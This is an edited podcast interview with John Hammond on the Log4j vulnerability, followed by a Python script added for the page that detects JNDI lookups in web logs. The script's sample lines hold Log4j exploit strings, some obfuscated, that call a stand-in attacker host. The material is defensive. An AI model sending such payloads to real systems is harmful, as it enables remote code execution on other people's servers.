Questions and Answers: John Hammond | Decipher



Huntress’s John Hammond joined Dennis Fisher on the Decipher podcast this week to discuss the Apache Log4j vulnerability. This is an edited and condensed transcript of the interview.

Dennis Fisher: What was your first reaction when you read the advisory and the fear dawned on you?

John Hammond: You hit the nail on the head: this Log4j package is ubiquitous. It is everywhere. It’s a Java logging package, which means that every time an application tries to record some type of activity, or what happens when a user interacts with the program, it logs it. It remembers that. The catch is that this Log4j library has added some extra functionality. The flaw and vulnerability that we are all screaming about, running around like chickens with their heads cut off, is that it will parse the data going into the log and take action on that input. That means, hey, it could reach out for code and actually execute it. It could call an outside host that is serving a malicious payload and give a malicious actor remote code execution, so it can detonate and really do whatever it wants. Honestly, that opens the door. It is initial access. But that could then lead to privilege escalation, post-exploitation, exfiltration, persistence, lateral movement and everything else.

Dennis Fisher: As I understand it, it can be exploited with just one line of code. There isn’t much in it.

John Hammond: That is absolutely correct. So I have tried to scream and shout about it to raise awareness as much as possible. I have a video demonstration, a walkthrough on my own YouTube channel, showing how easily this can be exploited in Minecraft, the silly kids’ game. That’s where I think it blew up. In all honesty, it is very difficult to validate and check what is vulnerable and where, because this package could bring this logging functionality into every aspect of a program, and that is the sinister thing about this vulnerability. Yes, it sure is a zero day, but other security researchers have compared this to a zero-day cluster bomb: there are so many different uses, and the hard part is figuring out where. You can’t just look for the filenames or, hey, the presence of Log4j, the class files, the jar files, as those have their own false positives and false negatives. Hey, the version may not be correct. It may not be used in some parts of the program and application you are looking at. Really the best way to find out what I consider to be vulnerable is by trying a payload, seeing if you get the connection and seeing that the callback comes back.

Dennis Fisher: I’ve looked at a lot of security vendors and technology vendors in general, looked at their websites to see what the updates are, and you can almost see people saying, we don’t think our product is vulnerable, and then an update 45 minutes later: it’s vulnerable.

John Hammond: I think people have compared this to Shellshock, another vulnerability with an absolutely huge attack surface that is still not dead. You know, it didn’t fall by the wayside, and I think with this Log4j vulnerability, while we’re screaming about it and it is on fire right now, we’re very, very early on. We will see this continue this week, possibly next month, months after that, perhaps years. I honestly don’t know. There is a very real possibility that software packages and code that are no longer maintained, out-of-date software applications that are simply dead, will never get a software patch or fix pushed forward, and while we as end users or asset administrators, IT practitioners, of course could try to update, could patch and update to the latest version of Log4j, could make these changes as best we can, the software and the vulnerabilities are in the applications provided by vendors or third parties that we are practically sitting on. We’re stuck waiting for them to push these updates downstream, and I don’t know how long that will take.

Dennis Fisher: I am also wondering about the whole open-source ecosystem, because you mentioned that there are likely some dead applications that are no longer serviced, or there is the other side of this coin, where all of these open-source projects are maintained, but it’s one person or two and they may not have the wherewithal to do this and get a patch out quickly. They likely have day jobs. They probably have other things to do.

John Hammond: Oh, absolutely, and that’s why we’re screaming about this thing, right? That’s why we make a big stink of it, because it’s such a big deal, and we’re trying to raise awareness. We try to hold the entire community and the industry accountable. This is absolutely difficult to swallow, but it has to be done. This is how we react. This is how we respond. I’m really glad you mentioned the open-source software developer’s perspective, because the application itself is an open-source utility put together by some of the people who make software as volunteer work. You know, they do it for love. It’s a passion. It is something they do in their spare time while holding down a normal job.

“We know this attack is trivial to pull together and carry out. It’s a single line of text.”
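Hammond’s point that the attack is a single line of text, and that the only reliable test is to send a payload and watch for the callback, has a defensive counterpart: the same one-line lookup string shows up in your inbound request logs. The following detection script is an added example written for this page; it is not code from the interview, from Huntress, or from the Log4j project. The access-log lines, the `attacker.example` host and the request paths are constructed for the example. It scans log lines for a Log4j-style `${jndi:...}` lookup, and because the first wave of exploitation hid the keyword behind nested lookups such as `${${lower:j}ndi:...}` and `${${::-j}...}`, it collapses those inner lookups the way an obfuscator intended before checking for `jndi:`. The resolution rules here cover only the `lower`, `upper` and `:-` default forms and are a deliberate subset of what Log4j itself evaluates.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in a web-server access-log shape. They are made up for
# this example and are not taken from the interview or from any real incident.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.12 - - "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 200',
    '203.0.113.13 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '203.0.113.14 - - "GET / HTTP/1.1" 200 "-" "${jndi:${env:NOPE:-ld}ap://attacker.example/d}"',
    '203.0.113.15 - - "GET /docs/${version} HTTP/1.1" 404',
]

# An "innermost" lookup: ${...} whose body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_MAX_ROUNDS = 16  # bound the inside-out resolution so hostile input cannot loop forever


def _resolve(body: str) -> str:
    """Collapse one innermost lookup body to the literal an obfuscator intended.

    Covers the three forms used to hide the 'jndi' keyword (an assumption of this
    example, not an exhaustive model of Log4j's own lookup evaluation):
      lower:J        -> 'j'      (case-mapping lookups)
      upper:j        -> 'J'
      ::-j           -> 'j'      (empty lookup falling back to its default)
      env:NOPE:-j    -> 'j'      (unknown variable falling back to its default)
    Anything else becomes an opaque placeholder so it can never spell 'jndi'.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return "\x00"


def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the de-obfuscated ${jndi:...} lookup found in `line`, or None.

    Works inside-out: whenever an innermost lookup already starts with 'jndi:'
    we are done; otherwise every innermost lookup is collapsed to its literal
    and the next layer is examined. ${version}-style placeholders that never
    resolve to a JNDI lookup are left alone and do not produce a hit.
    """
    text = line
    for _ in range(_MAX_ROUNDS):
        matches = list(_INNER.finditer(text))
        if not matches:
            return None
        for m in matches:
            if m.group(1).lower().startswith("jndi:"):
                return m.group(0)
        # No JNDI lookup yet: peel one layer of obfuscation and look again.
        text = _INNER.sub(lambda m: _resolve(m.group(1)), text)
    return None


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Report every line carrying a JNDI lookup, with the resolved lookup string.

    The resolved string is what an analyst wants: it exposes the attacker's
    callback host, which is the thing to block and to hunt for in egress logs.
    """
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        lookup = find_jndi_lookup(line)
        if lookup is not None:
            hits.append({"line": lineno, "lookup": lookup})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['lookup']}")
```

A hit only tells you that somebody tried; it does not tell you whether the receiving application is vulnerable, which is why Hammond recommends confirming with a payload of your own and watching for the callback. The inverse caveat also holds: the resolver above knows a handful of obfuscation forms, so a clean scan is not proof that no payload arrived, and egress to unexpected LDAP or RMI ports remains the stronger signal.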


